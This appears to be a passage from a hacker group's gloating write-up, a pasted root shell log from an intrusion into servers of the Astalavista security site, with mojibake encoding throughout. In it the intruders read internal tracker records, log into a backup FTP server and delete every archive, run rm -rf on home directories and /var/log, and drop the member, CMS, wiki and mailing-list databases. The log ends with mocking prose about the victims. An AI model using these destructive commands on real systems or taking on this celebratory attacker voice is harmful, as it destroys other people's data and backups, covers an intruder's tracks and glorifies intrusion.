+¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª+
| Website guidance | Virtual Girl which guides you trought the website.
We need a girl with who you can ( talk )!!!
Also for the News!
So my suggestion is a girl who read you the news loud if you like!
you can choose between read yourselfe or she read it for you or both!
Go to Á´½Ó±ê¼Çwww.heise.de! There is an example for Voice News! It¡¯s a good thing!!!
Have a look on the example girls!!
Á´½Ó±ê¼Çhttp://www.yaoti.com/de/free_yaoti.html
or that
Á´½Ó±ê¼Çhttp://www.yellostrom.de/
|
+¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª+
1 row in set (0.00 sec)
// ha ha.
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| iss_summary | iss_description |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.|
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
1 row in set (0.00 sec)
// LOL.
mysql> exit
Bye
sh-3.2# ftp 212.254.194.163
Connected to 212.254.194.163.
220 BackupCOM_VW FTP server ready.
504 AUTH: security mechanism ¡®GSSAPI¡¯ not supported.
504 AUTH: security mechanism ¡®KERBEROS_V4¡ä not supported.
KERBEROS_V4 rejected as an authentication type
Name (212.254.194.163:root): astalavista.com
331 Password required for astalavista.com.
Password:
230 User astalavista.com logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
227 Entering Passive Mode (212,254,194,163,2,188)
150 Opening BINARY mode data connection for ¡®file list¡¯.
dr-x¡ª¡ª 1 root users 4096 Jun4 06:13 astalavista.com
226 Transfer complete.
ftp> cd astalavista.com
250 CWD command successful.
ftp> ls -la
227 Entering Passive Mode (212,254,194,163,2,189)
150 Opening BINARY mode data connection for ¡®file list¡¯.
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
-rw-rw-rw- 1 astalavista.com users 26413034040 May2 00:21 09-05-01-astacom-Public_HTML.tar
-rw-rw-rw- 1 astalavista.com users 277843549 May1 17:29 09-05-01-astacom-SQL_Dump.tar
226 Transfer complete.
ftp> mdelete *
ftp> ls -la
227 Entering Passive Mode (212,254,194,163,2,193)
150 Opening BINARY mode data connection for ¡®file list¡¯.
226 Transfer complete.
ftp>
sh-3.2# cd /home
sh-3.2# ls -la
total 120
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
drwxr-xr-x 25 root root 4096 Jun3 02:43 ..
drwx¨Cx¨Cx9 admin admin 4096 Nov 282007 admin
-rw¡ª¡ª-1 root root 8192 Jun4 03:03 aquota.group
-rw¡ª¡ª-1 root root 8192 Jun3 02:45 aquota.user
drwx¨Cx¨Cx6 astanet astanet4096 Jun4 09:51 astanet
drwxr-xr-x2 root root 4096 Jul 292008 backup
drwxr-xr-x2 root root 4096 Sep 172008 backup.14161
drwx¨Cx¨Cx 10 com com 4096 Apr 28 12:40 com
drwxr-xr-x2 root root 4096 May 172007 ftp
drwx¡ª¡ª3 jon jon 4096 Sep 212007 jon
drwx¡ª¡ª2 root root 16384 Sep 112007 lost+found
drwxr-xr-x2 root root 4096 Sep 142007 my
drwxr-xr-x5 mysql mysql 4096 Sep 242007 mysqldata
drwx¡ª¡ª2 jon jon 4096 Sep 152007 test
drwxrwxrwt2 root root 4096 Jul 292008 tmp
sh-3.2# rm -rf backup/
sh-3.2# rm -rf backup.14161/
sh-3.2# rm -rf ftp/
sh-3.2# rm -rf jon/
sh-3.2# rm -rf my/
sh-3.2# rm -rf mysqldata/
sh-3.2# rm -rf test/
sh-3.2# rm -rf tmp/
sh-3.2# cd ~
sh-3.2# rm -rf *
sh-3.2# rm -rf /var/log/
rm: cannot remove directory `/var/log//proftpd¡¯: Directory not empty
sh-3.2# rm -rf /home/*
sh-3.2# mysql
Welcome to the MySQL monitor.Commands end with ; or \g.
Your MySQL connection id is 407156
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
Type ¡®help;¡¯ or ¡®\h¡¯ for help. Type ¡®\c¡¯ to clear the buffer.
mysql> show databases;
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| Database |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| information_schema |
| astanet_ads |
| astanet_mailing_lists |
| astanet_mediawiki |
| astanet_membersystem|
| com_contrexx |
| com_contrexx2 |
| com_contrexx2_live |
| da_roundcube |
| dolphin |
| ideapool |
| mysql |
| test |
| yourmaster |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
14 rows in set (0.03 sec)
mysql> drop database astanet_membersystem;
droQuery OK, 46 rows affected (0.81 sec)
mysql> drop database com_contrexx;
Query OK, 211 rows affected (2.72 sec)
mysql> drop database com_contrexx2;
Query OK, 237 rows affected (2.23 sec)
mysql> drop database com_contrexx2_live;
Query OK, 227 rows affected (7.63 sec)
mysql> drop database ideapool;
Query OK, 69 rows affected (0.19 sec)
mysql> drop database yourmaster;
Query OK, 158 rows affected (0.55 sec)
mysql> drop database astanet_ads;
Query OK, 9 rows affected (0.11 sec)
mysql> drop database astanet_mailing_lists;
Query OK, 24 rows affected (1.47 sec)
mysql> drop database astanet_mediawiki;
Query OK, 31 rows affected (0.51 sec)
mysql> show databases;
+¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| Database |
+¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| information_schema |
| da_roundcube |
| dolphin |
| mysql |
| test |
+¡ª¡ª¡ª¡ª¡ª¡ª¨C+
5 rows in set (0.00 sec)
What a journey! We¡¯re not sure exactly why the ¡°Terminator¡± had any influence on
their naming (conventions) but we¡¯re sure Arnold himself wouldn¡¯t be in the
wrong to say this pack of morons *wont be back*.
Ò³:
[1]